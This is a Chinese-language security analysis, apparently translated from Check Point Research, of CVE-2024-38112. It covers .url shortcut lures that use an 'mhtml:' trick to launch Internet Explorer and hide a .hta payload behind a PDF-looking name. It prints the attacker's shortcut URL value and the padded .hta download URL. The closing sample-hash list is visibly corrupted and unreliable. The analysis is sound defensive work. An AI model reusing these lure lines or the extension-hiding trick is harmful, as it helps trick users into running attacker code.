威胁行为者利用 INTERNET 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)

简介和背景

Check Point Research 最近发现，威胁行为者一直在使用新颖的（或以前未知的）技巧来引诱 Windows 用户进行远程代码执行。具体来说，攻击者使用特殊的 Windows Internet 快捷方式文件（.url 扩展名），单击该文件时会调用已退役的 Internet Explorer (IE) 来访问攻击者控制的 URL。在 IE 上还使用了另一种技巧来隐藏恶意的 .hta 扩展名。通过使用 IE 而不是 Windows 上更安全的现代 Chrome/Edge 浏览器打开 URL，攻击者在利用受害者的计算机方面获得了显著优势，尽管该计算机运行的是现代的 Windows 10/11 操作系统。

从技术背景来看，  威胁行为者使用 .url 文件作为初始攻击媒介的情况并不少见。甚至以前也发生过使用新型或零日 url 文件相关漏洞的情况——去年 11 月刚刚修补的CVE-2023-36025就是一个很好的例子。

我们发现的恶意 .url 样本最早可以追溯到 2023 年 1 月 （一年多前），最晚可以追溯到 2024 年 5 月 13 日 （截至撰写本文时，仅几天前）。这表明威胁行为者已经使用这些攻击技术一段时间了。

通过“mhtml”技巧复活 Internet Explorer

让我们使用 Virus Total 上的最新 .url样本作为示例来解释该技术。

样本内容：

图 1：恶意 .url 样本的内容

我们可以看到，.url 文件的最后几行字符串指向 Microsoft Edge 应用程序文件中的自定义图标msedge.exe。这会使它看起来指向 PDF 文件（但事实上并非如此）。

重要的是，我们可以看到，关键字的值URL与通常的值有很大不同 - 通常，对于常见的 .url 文件，参数URL看起来像URL=https://www.google.com指向 URL https://www.google.com。但在这个示例中，该值为：

mhtml:http: //cbmelipilla.cl/te/test1.html! x-usc:http://cbmelipilla.cl/te/test1.html

它使用了一个特殊的前缀mhtml:，并且!x-usc:中间还有一个。

几年前，我们在臭名昭著的 CVE-2021-40444 零日攻击中看到了同样的技巧（我们称之为“mhtml”技巧） ，其中文件document.xml.rels包含完全相同的字符串。

图2：CVE-2021-40444漏洞样本中的关键内容

我们知道，在利用 CVE-2021-40444 漏洞时，Word 文档中曾使用过“mhtml”技巧，现在我们看到在 .url 文件中也使用了相同的技巧。那么，攻击者可以利用这个技巧实现什么呢？让我们做一些测试。

如果我们将样本重命名为Books_A0UJKO.pdf.url（野外名称），.url 文件在（完全修补的）Windows 11 上将如下所示 - 显示为指向 PDF 文件的链接。

图 3：恶意 .url 文件在 Windows 11 上显示为 PDF 文件的链接

如果我们像受害者一样操作（我们想要打开 PDF），我们双击快捷方式文件。然后，受害者将得到以下内容：

图 4：受害者双击 .url 文件时，会出现 IE 和升级窗口对话框

看到有什么奇怪的地方了吗？Internet Explorer 打开了。事实上，通过一些调试技巧，我们能够确认 IE 确实被用来打开http://cbmelipilla[.]cl/te/test1.html.url 文件中指定的链接。

众所周知，微软几年前就宣布 IE 退役 。在典型的 Windows 10/11 上，正常的用户操作不应该能够打开 IE 来访问网站，因为它们不具备与现代浏览器相同的安全级别。IE 是一款过时的网络浏览器，以不安全而闻名——这是微软用现代且更安全的 Microsoft Edge 取代它的重要原因之一，或者用户只需安装并使用 Google 的 Chrome 浏览器即可。

免责声明：尽管 IE 已被宣布“退役并停止支持”，但从技术上讲，IE 仍然是 Windows 操作系统的一部分，并且“本质上并不不安全，因为 IE 仍然提供安全漏洞服务，并且应该没有已知的可利用的安全漏洞”，根据我们与微软的沟通。

因此，默认情况下，用户不应使用 IE 打开网站，除非用户明确要求并且用户完全知情。

然而，在这个示例中，使用“mhtml”技巧，当受害者打开 .url 快捷方式时（受害者认为他/她正在打开 PDF），攻击者控制的网站是使用 IE 打开的，而不是典型的 Chrome/Edge。

从那里（使用 IE 打开网站），攻击者可以做很多坏事，因为 IE 不安全且过时。例如，如果攻击者有一个 IE 零日漏洞（与 Chrome/Edge 相比更容易找到），攻击者可以攻击受害者以立即获得远程代码执行。然而，在我们分析的样本中，威胁行为者没有使用任何 IE 远程代码执行漏洞。相反，他们使用了 IE 中的另一个技巧（据我们所知，以前可能不为公众所知）来诱骗受害者获得远程代码执行。

额外的 IE 技巧 – 隐藏 .hta 扩展名

让我们再次回顾上图（下面突出显示）。根据显示的（IE）对话框，它似乎要求用户打开一个名为的 PDF 文件Books_A0UJKO.pdf。

图 5：仔细查看 IE 对话框 - 仅显示 PDF 文件名

然而，这是真实情况吗？你认为你打开的是 PDF 吗？

不是的。如果我们在上面的 IE 对话框中单击“打开”（默认选项），我们将得到另一个弹出的对话框（见下文）。这是由于 IE 的保护模式（相对较弱的浏览器沙盒）。

图 6：IE 保护模式警告对话框

如果受害者继续忽略警告（因为受害者认为他/她正在打开 PDF），受害者的机器最终将被黑客入侵——“打开”的文件实际上是正在下载和执行的恶意 .hta 文件。

如果我们仔细观察 HTTP 流量，我们会发现字符串末尾附加了许多不可打印的字符Books_A0UJKO.pdf。最后是 .hta 字符串——这是真正的（也是危险的）扩展名。

图 7：显示所访问完整 URI 的 HTTP 流量

这正是 IE 对话框不向用户显示 .hta 文件名的原因。真正的完整 URL 是：

https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E 2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta

利用这种技巧，攻击者可以更成功地引诱受害者继续执行操作，而事实上受害者正在下载并执行危险的 .hta 应用程序。

相关恶意 .url 样本 ITW

BD710e5E5EF3AD872f3f067811706060A8a073c87045a06a86fb4a7F0E4EF0 B16ae5B7DFAF2A61214E2C993E29DCBD59D8C20E0fd0AF75B76DD9170E104 490839a60 f4907ab8f28dd9db425e1cfab2D48E89437EF218A6E94 BFD59ed369057c325E517B2BE505F42D6016A47E8BDCBCBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBCBECBECBECB ECBECBECBECBECBECBECBECBECBECBECBECBCBECBECBECBECBECBECBECBECBECBECBECBECBECbe690210A3087d46D 22ED84c2A952 5e8c6a825fb53f2f30621C5E6c68B1051432B1C5C625AE46F8C C9f5D96 EC809a75679EC3C7A61EAAF3AAFBBBBBBBBBBBBBBBBBBBBB

结论

从漏洞利用的角度总结一下这些攻击：这些活动中使用的第一种技术是“mhtml”技巧，它允许攻击者调用 IE，而不是更安全的 Chrome/Edge。第二种技术是 IE 技巧，让受害者相信他们正在打开 PDF 文件，而事实上，他们正在下载和执行一个危险的.hta应用程序。这些攻击的总体目标是让受害者相信他们正在打开 PDF 文件，而这可以通过使用这两种技巧来实现。